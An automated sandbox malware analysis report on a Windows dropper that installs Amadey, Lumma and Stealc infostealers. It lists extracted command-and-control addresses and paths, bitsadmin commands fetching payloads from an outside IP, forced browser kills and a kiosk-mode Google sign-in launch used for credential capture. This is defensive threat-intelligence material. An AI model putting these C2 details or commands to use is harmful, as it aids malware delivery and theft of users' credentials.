Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2024 23:01

General

  • Target

    624dc975fb4b396b82fc08a6f1b9664d40c0576931839c8aa09f344938ced223.exe

  • Size

    7.1MB

  • MD5

    136acf9170ab9716fcd4845ce82c3cb4

  • SHA1

    d6574bd99920c5d777f69e7595d18204a9972a80

  • SHA256

    624dc975fb4b396b82fc08a6f1b9664d40c0576931839c8aa09f344938ced223

  • SHA512

    206efc430c3117b9d71bc3c0c7910bb458d6474400ef3748662a195ecabaed37bb0eca234f792ae4fe589012895cd9c5482bd9844491ecb0213f966f62b2b13c

  • SSDEEP

    196608:T61etDwoo14zL28osWzvnp629hdbj6ypDXM5a:W1cnoaX2zswnb9Hf68DX/

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://preside-comforter.sbs

https://savvy-steereo.sbs

https://copper-replace.sbs

https://record-envyp.sbs

https://slam-whipp.sbs

https://wrench-creter.sbs

https://looky-marked.sbs

https://plastic-mitten.sbs

https://hallowed-noisy.sbs

https://powerful-avoids.sbs

https://motion-treesz.sbs

https://disobey-curly.sbs

https://leg-sate-boat.sbs

https://story-tense-faz.sbs

https://blade-govern.sbs

https://occupy-blushi.sbs

https://frogs-severz.sbs

https://salve-windp.cyou

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 18 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\624dc975fb4b396b82fc08a6f1b9664d40c0576931839c8aa09f344938ced223.exe
    "C:\Users\Admin\AppData\Local\Temp\624dc975fb4b396b82fc08a6f1b9664d40c0576931839c8aa09f344938ced223.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4408
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e2q73.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e2q73.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4800
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\L0o66.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\L0o66.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:788
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1k74W5.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1k74W5.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4640
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1948
            • C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe
              "C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2176
              • C:\Windows\SysWOW64\ping.exe
                ping -n 1 8.8.8.8
                7⤵
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:852
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
                7⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:4444
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolwx.rar" "C:\Users\Admin\AppData\Local\Temp\jstsolwx.rar"
                7⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:2276
            • C:\Users\Admin\AppData\Local\Temp\1011781001\70003dde50.exe
              "C:\Users\Admin\AppData\Local\Temp\1011781001\70003dde50.exe"
              6⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3624
            • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
              "C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3432
            • C:\Users\Admin\AppData\Local\Temp\1011783001\c2c4f71421.exe
              "C:\Users\Admin\AppData\Local\Temp\1011783001\c2c4f71421.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3248
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 1656
                7⤵
                • Program crash
                PID:5328
            • C:\Users\Admin\AppData\Local\Temp\1011784001\794e4a372a.exe
              "C:\Users\Admin\AppData\Local\Temp\1011784001\794e4a372a.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3036
            • C:\Users\Admin\AppData\Local\Temp\1011785001\eaf8540b42.exe
              "C:\Users\Admin\AppData\Local\Temp\1011785001\eaf8540b42.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:920
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2684
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2580
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1208
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3380
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3192
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:3212
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:956
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1932 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4c729e6-5df1-4724-8446-db4c11907f2b} 956 "\\.\pipe\gecko-crash-server-pipe.956" gpu
                      9⤵
                        PID:3860
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2488 -parentBuildID 20240401114208 -prefsHandle 2480 -prefMapHandle 2476 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd596786-ab27-4d78-96cd-6a901399ac60} 956 "\\.\pipe\gecko-crash-server-pipe.956" socket
                        9⤵
                          PID:2008
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3124 -childID 1 -isForBrowser -prefsHandle 3096 -prefMapHandle 2796 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb916d5c-9a2c-4a6a-8978-6f663c44eec1} 956 "\\.\pipe\gecko-crash-server-pipe.956" tab
                          9⤵
                            PID:4716
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3916 -childID 2 -isForBrowser -prefsHandle 3908 -prefMapHandle 3892 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38166315-f2f0-4773-91c6-1f0fc20afd2f} 956 "\\.\pipe\gecko-crash-server-pipe.956" tab
                            9⤵
                              PID:1928
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4488 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4468 -prefMapHandle 4476 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82aa7ef1-eae6-4a6d-ada1-ea52c7045061} 956 "\\.\pipe\gecko-crash-server-pipe.956" utility
                              9⤵
                              • Checks processor information in registry
                              PID:6464
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4092 -childID 3 -isForBrowser -prefsHandle 5580 -prefMapHandle 3932 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6755c71f-09af-4165-9517-bef9718a2ec8} 956 "\\.\pipe\gecko-crash-server-pipe.956" tab
                              9⤵
                                PID:6420
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5832 -childID 4 -isForBrowser -prefsHandle 5752 -prefMapHandle 5760 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46ae4ee9-ab1b-4c6d-8fb0-a74b6553518a} 956 "\\.\pipe\gecko-crash-server-pipe.956" tab
                                9⤵
                                  PID:6476
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6016 -childID 5 -isForBrowser -prefsHandle 5936 -prefMapHandle 5940 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7564780-796a-45ce-99d7-abc71bb17353} 956 "\\.\pipe\gecko-crash-server-pipe.956" tab
                                  9⤵
                                    PID:1628
                            • C:\Users\Admin\AppData\Local\Temp\1011786001\dc5f73cabf.exe
                              "C:\Users\Admin\AppData\Local\Temp\1011786001\dc5f73cabf.exe"
                              6⤵
                              • Modifies Windows Defender Real-time Protection settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4556
                            • C:\Users\Admin\AppData\Local\Temp\1011787001\rhnew.exe
                              "C:\Users\Admin\AppData\Local\Temp\1011787001\rhnew.exe"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5544
                            • C:\Users\Admin\AppData\Local\Temp\1011788001\45e7236aff.exe
                              "C:\Users\Admin\AppData\Local\Temp\1011788001\45e7236aff.exe"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5808
                        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2f4472.exe
                          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2f4472.exe
                          4⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1728
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 1704
                            5⤵
                            • Program crash
                            PID:1852
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 1692
                            5⤵
                            • Program crash
                            PID:1372
                      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Y27V.exe
                        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Y27V.exe
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4188
                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4o587L.exe
                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4o587L.exe
                      2⤵
                      • Modifies Windows Defender Real-time Protection settings
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Windows security modification
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4936
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1728 -ip 1728
                    1⤵
                      PID:3240
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1728 -ip 1728
                      1⤵
                        PID:4268
                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4764
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 3248 -ip 3248
                        1⤵
                          PID:5300
                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          1⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2684

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yuzka873.default-release\cache2\entries\39DB9E847E680B765D7B04FCCE6BF5BC0225F878

                          Filesize

                          13KB

                          MD5

                          fb3d877dba40d9a94a28614d0eb0b870

                          SHA1

                          da789ae7ff6fa80569ea3b479881789995311b1e

                          SHA256

                          48c7dc77c46d46dde55c3e83911e550ec411ea6a6ac1ca633688c63294498f94

                          SHA512

                          08ada50925fcbb2ca15e69946bec99e8c489fe83d7f8524e08a9def151195c17e9e0e1982ec6a4d1c9527f9490f1ef41d7748bde155e5dbb1021156b2c9dffe7

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yuzka873.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

                          Filesize

                          13KB

                          MD5

                          d9245d25cb6c4999b894b5674a47b6a1

                          SHA1

                          cd8653eeb2a630a93a3129836a49c2fb38f27a52

                          SHA256

                          8afb9639d469bf27b761e791c7ac80f82855097b83254ead74d59b75afbdd711

                          SHA512

                          a0f1d5918e26d8abb519865ae3243e65420c78896fbf9d2876ef9f6c0811bbe353060b62395f9f23423e4e46e53ca748c7ded97b66707a921bfdaf860ea90526

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\yuzka873.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                          Filesize

                          15KB

                          MD5

                          96c542dec016d9ec1ecc4dddfcbaac66

                          SHA1

                          6199f7648bb744efa58acf7b96fee85d938389e4

                          SHA256

                          7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                          SHA512

                          cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                        • C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe

                          Filesize

                          42KB

                          MD5

                          dd587632bd83be28e06fc74be5ffe634

                          SHA1

                          9ffc068a93bcd0b880ab1113a1082a9823bfb16f

                          SHA256

                          21236dee121b0f9fe9cf21093f857d092bb9c56b57b59c52d65ec204408c15a7

                          SHA512

                          d93bd61d9dabe3fa53bd8e63a509c760dce09c8091d6236ac1370147b075fe2a5c48ee756ac09c4a3bb7923dc53d3f20d4a213cac0b24fe37efba29e09941882

                        • C:\Users\Admin\AppData\Local\Temp\1011781001\70003dde50.exe

                          Filesize

                          4.3MB

                          MD5

                          c501cb7602ddf66c6fa9d272882d8d81

                          SHA1

                          d0ba1811dc9b21c7a401d88d7fe77f49e46d02de

                          SHA256

                          8fc1e876d9a0bca4c1124bdd06cdfed283d8e5aef2c80498ca3a4d6c07dc8853

                          SHA512

                          cc20b04958ed053ce4181d6cfe0424a28a91bf869b0da0c4a04fb8818ad8738d0784729d0073fc183f306f6b3a631d2525276aa951776fe51844a3e24091543e

                        • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe

                          Filesize

                          5.0MB

                          MD5

                          71c8588c96e879748f4c320c9b4aeec2

                          SHA1

                          9a5baa7e9b1c6b8b5d3ff674dcae22ae017d8447

                          SHA256

                          a4bb60772446f2cd2f7629574bbf5702c35ce2afcf6e4b3a3d157281cecc7234

                          SHA512

                          8ab113c203eab23f4969b45ec4cc3c383e402f5a32dea035032e340bf8b9aacf5c734c259419ebb146cf2426b1f944032ce944cb2d9714255907989f260c5a0e

                        • C:\Users\Admin\AppData\Local\Temp\1011783001\c2c4f71421.exe

                          Filesize

                          1.8MB

                          MD5

                          4c3aefa6b5218d81bcb8517c214f8818

                          SHA1

                          b866bdd0f4164c48fe32fb8a6125a1439e30c103

                          SHA256

                          9c6c5727324e4e7ff17b6106df1a9eadaecf6453510d11f92c0cb2baef5833a2

                          SHA512

                          667c3adbf952767f6be0ab20b9b41987c655f86dc120a0c94407e53b1dfe9df94b739cc9f9c5e1242b1cd836f669a163fd0acce1fc76a52dd7601223d168eb63

                        • C:\Users\Admin\AppData\Local\Temp\1011784001\794e4a372a.exe

                          Filesize

                          1.7MB

                          MD5

                          a95edbdd86272899eed1c9c81502e3ec

                          SHA1

                          93dcdcccb2b468d45a9ff805364b86344716ec23

                          SHA256

                          117748bbea88985c6ce0aa4af1086fa41f467ddf76f7fdad05125925644d3b84

                          SHA512

                          97de19f6198d0f31f70d07d025b00d714b41696800c6d91c5cd3bda9a97cc19da0533337102d3d669cb6ee3759d88aaa6862b6951e7bb58d0695fbb1d10569f7

                        • C:\Users\Admin\AppData\Local\Temp\1011785001\eaf8540b42.exe

                          Filesize

                          946KB

                          MD5

                          d3b794713cc6db8e9327421bb78c4923

                          SHA1

                          d002c0ff9f8857b088585942d02cee4fd9f1ef6e

                          SHA256

                          99ffd59f67c36c7c9df243734375967bb80758bd5965ebe7803cbdd36227409f

                          SHA512

                          9c1ef5993e31586f80d49f54e922f1a688b0d5bb8f61a4d7b20e17c7378e403901ebf1bcf9392aca4113af058f062c3860c5e242b1389d86f2ee9104e9efa713

                        • C:\Users\Admin\AppData\Local\Temp\1011786001\dc5f73cabf.exe

                          Filesize

                          2.6MB

                          MD5

                          cddb95cb4b876e90d23e82d10b84d970

                          SHA1

                          bc2f2edc26b566c1b715c2d16d155332993874cb

                          SHA256

                          d34d80f0c45c81e78228eade52bf7a79fd32c8e2d6ec00a11d540f480bd28609

                          SHA512

                          b4be4900b90e770e48e0c59642014cbf13d45e7c5e177f4501cd48bbb20ca8d238e3e8e27fcb67affeb3c0cbe16d0356544d572700a2f711d344abc734ed2de8

                        • C:\Users\Admin\AppData\Local\Temp\1011787001\rhnew.exe

                          Filesize

                          1.8MB

                          MD5

                          a84456172908e096d0ac6272b9503e08

                          SHA1

                          8b64d38bae9fc390e621323e9e91eb8f7def421c

                          SHA256

                          4f95dff270ac4172d470789c3fce9ae2c656565a3887afc86507ec49981bd128

                          SHA512

                          3237f19915957327d3debd46de1c52531622fba5dbb2e06c9685ca336bd4febf19c2f3dd533c5046b0e676d21f10ba10478b3bbe9dbb31823b7dc118a6413800

                        • C:\Users\Admin\AppData\Local\Temp\1011788001\45e7236aff.exe

                          Filesize

                          1.9MB

                          MD5

                          35cfc749cdabb8cd51654d78b9748374

                          SHA1

                          c949801c7ea9d88d8769696e5ddf22e06e95f241

                          SHA256

                          2840ded7408a604248f60f9566a19c5f8dca193d7f6605c68ea1c04b8a7adc16

                          SHA512

                          98688eebcd449a5d2a1ed07959fbce17423aee1d4ffccb3cb4b17a5c1c9430ec20f5a3f38237de7e0e014ba9fa39740229d6eaa781870e788f6a8558241416ce

                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4o587L.exe

                          Filesize

                          2.7MB

                          MD5

                          2490b83d42152804dd6911dae9d57b9d

                          SHA1

                          f0511fa429173266a5fc4173bc2317f44db1bf76

                          SHA256

                          6f8b8367498695d4e0dde1072b4b31e4aa5e11d73bab3dbda858a287186e9c3e

                          SHA512

                          a712e56b9aa52901ba13ed6ac00d3565f890ed69e81fd661b5df651903c47b9389d4ee905041f34b3cb3381b29c1762907db1551ed7cf16b2b468a6caf765cea

                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e2q73.exe

                          Filesize

                          5.5MB

                          MD5

                          efd1c6bfa8e79db02b5081e9e941a9c5

                          SHA1

                          8bcfe0d602b90daa5f98fc1e7f43355ca8fb8775

                          SHA256

                          2f7e38f1eea5f968083a60254110e43f35bb578280f7b34147eee19e1e2d3e4c

                          SHA512

                          e700b7e3987f33122dcb474ecbd8836b8f54f1cdda39105949a5d80f9c8428666e978db7eab80aae40f2c0524266ab12511b05876c15b7af31c18fa544ca3e32

                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Y27V.exe

                          Filesize

                          1.7MB

                          MD5

                          9c9d3e584df24ab3e393e1cf3a1d22bb

                          SHA1

                          fc54421a0f10399c33daa802018fa55d1cb3fc1e

                          SHA256

                          8c32a93b51b5a8f3dc864634df9e64033024814f88d4724d321f4af591b5fcff

                          SHA512

                          548277217b14c89bced03e197f6bfe1039c22b36bc831263a3c28ef73d454317fc3d5ce6b96d6c02f80b24660ee0c1d563ba659365c3e51a432e89beb4f1957c

                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\L0o66.exe

                          Filesize

                          3.7MB

                          MD5

                          2ad344cd9ba7765d4aef5ae48b9f9de1

                          SHA1

                          61233c777d2c1e920d48a62febbbfb87f8cb0385

                          SHA256

                          a681dc8677a089ba5912b93791a1c8911adaa5ff58da99c25620f8a738e1ad97

                          SHA512

                          7938b9ac2201164dba801473335dc9eeb16950a6beb36a5405f00de73052b45f1a7372d2cee0ad9cadf0cd3b5d8f7d52139b2f43f99a0c9bd23fc1f634acf280

                        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1k74W5.exe

                          Filesize

                          1.8MB

                          MD5

                          44880800383f2d1e6ba9415f3ab244f3

                          SHA1

                          e0c65a51792be71d737c657164eb71dfc33e756a

                          SHA256

                          82460b8569927f518661f783b5690e7feb08d8cb43afb5d0ecd01127c2672ef6

                          SHA512

